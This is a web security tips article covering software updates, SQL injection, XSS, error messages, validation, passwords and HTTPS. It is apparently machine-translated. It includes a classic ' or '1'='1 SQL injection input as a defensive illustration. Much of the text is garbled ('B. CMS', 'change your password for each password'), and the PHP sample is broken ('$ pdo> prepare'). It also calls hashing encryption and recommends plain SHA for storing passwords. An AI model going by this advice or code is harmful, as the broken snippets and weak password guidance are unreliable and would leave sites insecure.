You may not think your site has anything worth being hacked for, but websites are compromised all the time. The majority of website security breaches are not to steal your data or mess with your website layout, but instead attempts to use your server as an email relay for spam, or to set up a temporary web server, normally to serve files of an illegal nature. Other very common ways to abuse compromised machines include using your servers as part of a botnet, or to mine for Bitcoins. You could even be hit by ransomware.
01. Keeping Software Up-to-date
It may seem obvious, but keeping all software up-to-date is very important to the security of your website. This applies to both the server operating system and the software that your website may be running (such as:). B. CMS or forum. If the software finds website vulnerabilities, hackers will immediately try to exploit them. If you are using a
managed hosting solution, you don't have to worry too much about applying operating system security updates as the hosting company has to handle it.
If you are using third-party software on your website. B. CMS or forums need to apply all security patches quickly. Most providers have mailing lists or RSS feeds detailing website security issues. WordPress, Umbraco, and many other CMSs notify you of system updates available at login.
Many developers use tools such as Composer, npm, and RubyGems to manage software dependencies and vulnerabilities that appear in packages they depend on but don't pay attention to. This is one of the methods. Keep your dependencies up-to-date and use tools such as Gemnasium to get automatic notifications when a vulnerability is disclosed to one of your components.
02. Pay attention to SQL injection
In SQL injection attacks, attackers use web form fields or URL parameters to access or tamper with the database. With standard Transact-SQL, it's easy to unknowingly inject malicious code into your queries that could be used to modify tables, retrieve information, or delete data. You can easily prevent this by always using parameterized queries. Most web languages have this feature and are easy to implement.
Consider the following query.
"SELECT * FROM table WHERE column =` "+ parameter +"'; "
If an attacker modifies a URL parameter and passes'or '1' = '1, the query looks like this:
"SELECT * FROM table WHERE column ='' OR '1' = '1';"
"1" is equal to "1", so an attacker can add an additional query at the end of the SQL statement. This will also be done.
This query can be modified by explicitly parameterizing it. For example, if you are using MySQLi with PHP:
$ stmt = $ pdo> prepare ('SELECT * FROM table WHERE column =: value');
$ stmt> execute (array ('value' => $ parameter));
03. Protect from XSS attacks
Cross-site scripting (XSS) attacks can inject malicious JavaScript into a page and run it in the user's browser to modify the page content or steal information and send it back to the attacker. .. For example, viewing a page comment without confirmation could allow an attacker to send a comment containing script tags and JavaScript that would be executed in another user's browser and steal the login cookie. This gives the attacker control over the account from all users. The comment was displayed. You need to prevent users from inserting active JavaScript content into your pages.
This is especially problematic in modern web applications where pages are built primarily from user content, often generate HTML, and are also interpreted by front-end frameworks such as Angular and Ember. These frameworks provide many XSS protections, but mixing server and client rendering creates new and more complicated attack avenues too: not only is injecting JavaScript into the HTML effective, but you can also inject content that will run code by inserting Angular directives, or using Ember helpers.
The key here is to focus on how your usergenerated content could escape the bounds you expect and be interpreted by the browser as something other that what you intended. This is similar to defending against SQL injection. When dynamically generating HTML, use functions that explicitly make the changes you're looking for (e.g. use element.setAttribute and element.textContent, which will be automatically escaped by the browser, rather than setting element[removed] by hand), or use functions in your templating tool that automatically do appropriate escaping, rather than concatenating strings or setting raw HTML content.
04. Pay attention to the error message
Pay attention to the amount of information provided in the error message. It provides the user with minimal error so that the secrets that exist on the server (such as API keys and database passwords) are not revealed. Also, do not provide complete exception details as it can greatly simplify complex attacks such as SQL injection. Save detailed errors in the server log and show users only the information they need.
05. Verify on both sides
Validation should always be done on both the browser side and the server side. The browser can catch simple errors. B. If you want to empty the required fields and enter text in pure numeric fields. However, these can be avoided and you should check this and more detailed validation on the server side. Failure to do so can result in malicious or scripted code being inserted into the database and undesired results for your website.
06. Check your passwords
Everyone knows they should use complex passwords, but that doesn`t mean they always do. It is crucial to use strong passwords to your server and website admin area, but equally also important to insist on good password practices for your users to protect the security of their accounts.
As much as users may not like it, enforcing password requirements such as a minimum of around eight characters, including an uppercase letter and number will help to protect their information in the long run.
Passwords should always be stored as encrypted values, preferably using a one way hashing algorithm such as SHA. When using this method, the encrypted values are compared only when authenticating the user. To increase the security of your website, we recommend that you change your password for each password.
If someone hacks and steals your password, it is impossible to decrypt it, so using a hashed password may help mitigate the damage. The best way anyone can do is a dictionary attack or a brute force attack, which basically guesses all combinations until a match is found. When using salt passwords, each salt + password must be hashed individually each time it is guessed, which is computationally expensive and makes decrypting many passwords even slower.
07. Use HTTPS
HTTPS is a protocol used to provide security over the Internet. HTTPS ensures that the
is communicating with the server that the user expects and that no other user can intercept or modify the content displayed during the transfer.
If you have something you want to keep private, we strongly recommend that you use HTTPS only to serve it. This, of course, means credit cards and sign-up pages (and the URLs they send), but usually many sites do the same. For example, registration forms are often sent to websites with all other requests from registered users and set a cookie that is used to authenticate those requests. An attacker who steals this could impersonate the user completely and hijack the login session. In most cases, you should use HTTPS throughout your website to thwart these types of attacks.
This is not as complicated or expensive as it used to be. Let's Encrypt provides a completely free automated certificate required to enable HTTPS. There are also existing community tools for various popular platforms and frameworks to set this up automatically. In particular, Google has announced that using HTTPS will move you to the top of the search rankings. This also gives you the benefits of SEO. Insecure HTTP is coming soon and it's time to upgrade.
Are you already using HTTPS everywhere? Go ahead and check the HTTP Strict Transport Security (HSTS) setup. This is a simple header that you can add to your server's response to prohibit insecure HTTP across your domain.